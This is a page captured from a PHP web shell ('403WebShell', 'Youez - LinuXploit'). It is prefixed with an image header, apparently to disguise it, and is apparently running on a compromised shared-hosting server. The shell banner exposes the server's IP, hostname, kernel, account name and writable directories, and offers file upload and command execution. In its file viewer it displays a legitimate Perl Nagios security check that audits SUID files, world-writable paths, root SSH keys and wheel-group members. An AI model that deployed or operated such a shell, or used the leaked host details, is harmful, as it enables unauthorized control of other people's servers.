����JFIF��x�x����'403WebShell
403Webshell
Server IP : 78.140.185.180  /  Your IP : 18.119.0.207
Web Server : LiteSpeed
System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : builderbox ( 1072)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /lib64/nagios/plugins/extra/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /lib64/nagios/plugins/extra/check_security
#!/usr/bin/env perl
use extreme;
use Getopt::Long;
use Digest::MD5 qw(md5_hex);
use JSON::XS;
use File::Slurp qw(read_file write_file);

my $exitcode = 0;
my $append = ' ';
my ( $opt_u, $opt_d, $opt_md5, $opt_e, $opt_c, $opt_t );

help() if !(@ARGV);
# Set options
GetOptions(
  "help|h"    => \&help,
  "u=s"       => \$opt_u,
  "d=s"       => \$opt_d,
  "md5=s"     => \$opt_md5,
  "e=s"       => \$opt_e,
  "c=s"       => \$opt_c,
  "t=s"       => \$opt_t,
);
unless ( $opt_u && $opt_md5 && $opt_c ) {
    &help;
}

our ( %whitelist, @suid, @world );

push ( @suid,
  '/usr/lib64/nagios/plugins/check_ide_smart',
  '/usr/lib64/nagios/plugins/check_icmp',
  '/usr/lib64/nagios/plugins/check_fping',
  '/usr/lib64/nagios/plugins/check_dhcp',
  '/usr/bin/quota',
  '/usr/bin/gpasswd',
  '/usr/bin/su',
  '/usr/bin/crontab',
  '/usr/bin/passwd',
  '/usr/bin/sudo',
  '/usr/bin/mount',
  '/usr/bin/pkexec',
  '/usr/bin/umount',
  '/usr/bin/newgrp',
  '/usr/bin/chage',
  '/usr/lib/polkit-1/polkit-agent-helper-1',
  '/usr/sbin/unix_chkpwd',
  '/usr/sbin/usernetctl',
  '/usr/sbin/pam_timestamp_check',
  '/usr/libexec/dbus-1/dbus-daemon-launch-helper',
  '/usr/share/python-cllib/userdomains',
  '/usr/sbin/userhelper',
  '/usr/bin/chsh',
  '/usr/bin/chfn',
  '/usr/bin/at',
  '/usr/bin/staprun',
  '/usr/sbin/mount.nfs',
);

if ( $opt_t && $opt_t eq 'shared' ) {
    # check if cpanel users in cagefs
    my @cagefs = `/sbin/cagefsctl --list-enabled`;
    shift @cagefs;
    chomp @cagefs;
    my @incidents_cagefs;
    my @users_shared;
    my @exclude = split ( ',', $opt_e ) if $opt_e;

    # cpanel
    if ( -d '/var/cpanel/users' ) {
        for my $user (</var/cpanel/users/*>) {
            $user = ( split '/', $user )[-1];
            next if -f '/var/cpanel/suspended/' . $user;
            push @users_shared, $user;
        }
    }

    # ispmanager
    if ( -f '/usr/local/mgr5/sbin/mgrctl' ) {
        my $users_info_raw = `/usr/local/mgr5/sbin/mgrctl -o json -m ispmgr user`;
        my $users_info = decode_json($users_info_raw)->{doc}{elem};
        my @active = grep { $_->{active}{'$'} eq 'on' } @{$users_info};
        push @users_shared, $_->{name}{'$'} for (@active);
    }

    # directadmin
    if ( -d '/usr/local/directadmin' ) {
        my $prefix = '/usr/local/directadmin/data/users';
        for my $user (<$prefix/*>) {
            $user = ( split '/', $user )[-1];
            next if !-f "$prefix/$user/user.conf";
            my $suspended = map /^suspended=yes/,
            read_file("$prefix/$user/user.conf");
            next if $suspended;
            push @users_shared, $user;
        }
    }

    for (@users_shared) {
        push @incidents_cagefs, $_ unless ( ( $_ ~~ @cagefs || $_ ~~ @exclude ) );
    }

    if (@incidents_cagefs) {
        $exitcode = 2;
        print_match( 'Found users with disabled CageFS:', @incidents_cagefs );
    }

    push ( @world,
        '/etc/cxs/cxscgi.queue',
        '/var/lib/net-snmp/mib_indexes/0',
        '/var/lib/patchman/tmp'
    );
    push ( @suid,
        '/usr/sbin/exim',
        '/usr/sbin/suexec',
        '/usr/bin/cagefs_enter.proxied',
        '/usr/lib64/mysql/plugin/auth_pam_tool_dir/auth_pam_tool'
    );
}

if ( $opt_t && $opt_t eq 'tools' ) {
    push ( @suid,
        '/usr/bin/fusermount',
        '/usr/sbin/grub2-set-bootflag',
        '/usr/libexec/qemu-bridge-helper',
        '/usr/libexec/sssd/ldap_child',
        '/usr/libexec/sssd/proxy_child',
        '/usr/libexec/sssd/selinux_child',
        '/usr/libexec/sssd/krb5_child'
    );
    push ( @world,
        '/var/cache/coolkey',
        '/var/.vz_swap'
    );
}

$whitelist{'world'} = \@world;
$whitelist{'suid'} = \@suid;

my @users = split ( ',', $opt_u );

# populate find cmd and execute it
my @dirs = split ( ',', $opt_d ) if $opt_d;
for my $dir (@dirs) {
    chomp $dir;
    next if $dir !~ qr{^(/[a-zA-Z0-9*_-]+)+$}x;
    $append .= '! \( -path "' . $dir . '*" -prune \) ';
}
my $cmd = 'find / \( -type f -o -type d \) ' . $append;

my $world_cmd = $cmd . '-perm /o+w 2>/dev/null';
my @world_files = execute_find( $world_cmd, 'world' );

if (@world_files) {
    print_match( 'World readable/writable files found:', @world_files);
    $exitcode = 1;
}

my $suid_cmd = $cmd . '-perm /4000 2>/dev/null';
my @suid_files = execute_find( $suid_cmd, 'suid' );

if (@suid_files) {
    print_match( 'Files with SUID bit found:', @suid_files);
    $exitcode = '1';
}

# check for ssh keys amount and hashsum
my $ssh_file = '/root/.ssh/authorized_keys';
open ( my $FILE, '<', $ssh_file );
my @content = sort <$FILE>;
chomp @content;
1 while <$FILE>;
my $count = $.;
close $FILE;
my $md5_hash = md5_hex(@content);

if ( $count > $opt_c ) {
    $exitcode = 2;
    say '*******';
    say 'The amount of keys in ' . $ssh_file . ' does not match the amount of users passed!';
    say 'Check the file for possible unwanted or malicious keys.';
}

if ( $md5_hash ne $opt_md5 ) {
    $exitcode = 2;
    say '*******';
    say 'URGENT: The md5 hash for ssh keys file does not match!';
}

# check wheel group
my ( $gname, $gpasswd, $gid, $gmembers, %garray, @wheel_users );
while ( ( $gname, $gpasswd, $gid, $gmembers ) = getgrent ) {
    next if ( $gname ne 'wheel' );
    @wheel_users = split( /\s+/, $gmembers );
}

my @incidents_wheel;

for my $wheel_user (@wheel_users) {
    push @incidents_wheel, $wheel_user unless $wheel_user ~~ @users;
}

if (@incidents_wheel) {
    $exitcode = 2;
    print_match( 'Found extra users in wheel group:', @incidents_wheel );
}

exit $exitcode;

# subs
sub help {
    print "Usage : $0 -u user1,user2,user3 -d dir1,dir2,dir3\n";
    print "Options :\n";
    print " -u: List of usernames to search in wheel group\n";
    print " -d: List of directories to exclude from find string\n";
    print " -md5: md5sum for ssh key file, here is an example how to calculate it:\n";
    print '  perl -e \'use Digest::MD5 qw(md5_hex); print md5_hex(sort map { chomp; $_ } <>)\' /root/.ssh/authorized_keys' . "\n";
    print " -e: List of usernames to exclude from CageFS checks\n";
    print " -c: Amount of keys that are expected to reside in authorized_keys file\n";
    print " -t: server type to generate additional whitelist exceptions. Current available values: shared, tools.";
    print "\nExample of usage : $0 -u admin,dev -d /proc,/usr/lib64 -md5 2a53da1a6fbfc0bafdd96b0a2ea29515 -e username1,username2\n";
    exit 3;
}

sub print_match {
    my ( $message, @info ) = @_;
    say '*******';
    say $message;
    say join( "\n", @info );
}

sub execute_find {
    my ( $cmd, $type ) = @_;
    my @list = `$cmd`;
    chomp @list;
    return if !@list;
    my $wlfile = '/etc/icinga2/plinc/security_' . $type . '_wl';
    write_file( $wlfile, join ( "\n", @{$whitelist{$type}} ) ) if !-f $wlfile;
    my @whitelist = read_file($wlfile);
    chomp @whitelist;
    if ( @whitelist ) {
        for my $line (@whitelist) {
            @list = grep {!/^$line$/} @list;
        }
    }
    return @list;
};

Youez - 2016 - github.com/yon3zu
LinuXploit